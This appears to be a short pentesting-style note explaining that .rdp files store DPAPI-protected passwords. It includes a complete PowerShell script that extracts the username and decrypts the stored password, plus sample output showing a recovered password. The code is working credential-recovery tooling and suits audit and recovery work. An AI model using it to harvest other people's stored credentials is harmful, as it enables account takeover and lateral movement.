RDP File encrypted password

Come accross a .rdp file with encrypted password like this?

full address:s:172.16.0.32
username:s:joe
password 51:b:01000000D08C9DDF0115D1118C7...7C9CD17D414000000B542DA5BA10CBD5C77EF075D822F0F7A1FFD77C0
screen mode id:i:2
<SNIPPED>

RDP files can store the password for a connection. The password is protected with the users key who saved the file.

The password can be decrypted by the .NET System.Security.Cryptography.ProtectedData class.

This script opens a rdp file and retrieve the user and the password:

<#
    .SYNOPSIS
        A PowerShell script to decrypt passwords from rdp files
    .DESCRIPTION
        A PowerShell script to decrypt passwords from rdp files
    .PARAMETER rdpfile
        rdp file
#>
[CmdletBinding()]
Param(
  [Parameter(Mandatory=$true,Position=1)][alias("f")][string]$rdpfile="C:\Users\Joe\Desktop\WS02.rdp"
)  
 
if(-not (Test-Path $rdpfile))
{
    write-warning ("File {0} not found!" -f $rdpfile)
    exit 2
}
 
[string]$sUserName=$null
[string]$sDomain=$null
[string]$sEncryptedPass=$null
[string]$sPass=$null
 
# Read RDP File
$sFileContent=Get-Content $rdpfile
foreach($sLine in $sFileContent)
{
    if($sLine.StartsWith("username:s:"))
    {
        $sUserName=$sLine.Replace("username:s:","")
    }
    elseif($sLine.StartsWith("domain:s:"))
    {
        $sDomain=$sLine.Replace("domain:s:","")
    }
    elseif($sLine.StartsWith("password 51:b:"))
    {
        $sEncryptedPass=$sLine.Replace("password 51:b:","")
    }
}
# Check Input
if(!$sUserName)
{
    write-warning "No username found!"
    exit 2
}
if(!$sEncryptedPass)
{
    write-warning "No encrypted password found!"
    exit 2
}
if($sUserName.IndexOf("\") -lt 0 -and  $sDomain)
{
    $sUserName="{0}\{1}" -f $sDomain,$sUserName
}
 
 
[System.reflection.assembly]::LoadWithPartialName("System.Security") | out-null
 
$iBytes=$sEncryptedPass.Length/2
[byte[]]$aEncryptedPasswordBytes = New-Object -TypeName byte[] $iBytes
for ($i = 0; $i -lt $iBytes; $i++) {
    $aEncryptedPasswordBytes[$i] = [System.Convert]::ToByte($sEncryptedPass.Substring($i*2,2), 16)
}
[byte[]]$passwordAsBytes = [System.Security.Cryptography.ProtectedData]::Unprotect($aEncryptedPasswordBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$sPass=[System.Text.Encoding]::Unicode.GetString($passwordAsBytes)
 
write-host ("{0,-16} : {1}" -f "UserName",$sUserName)
write-host ("{0,-16} : {1}" -f "Password",$sPass)

Output:

PS C:\Users\Administrator\Downloads> .\decr.ps1
UserName         : joe
Password         : Pass123

Such a file does only work on the PC where the encrypted password is generated because it is bound to the users key of that machine by using the DPAPI.

Last updated 7 months ago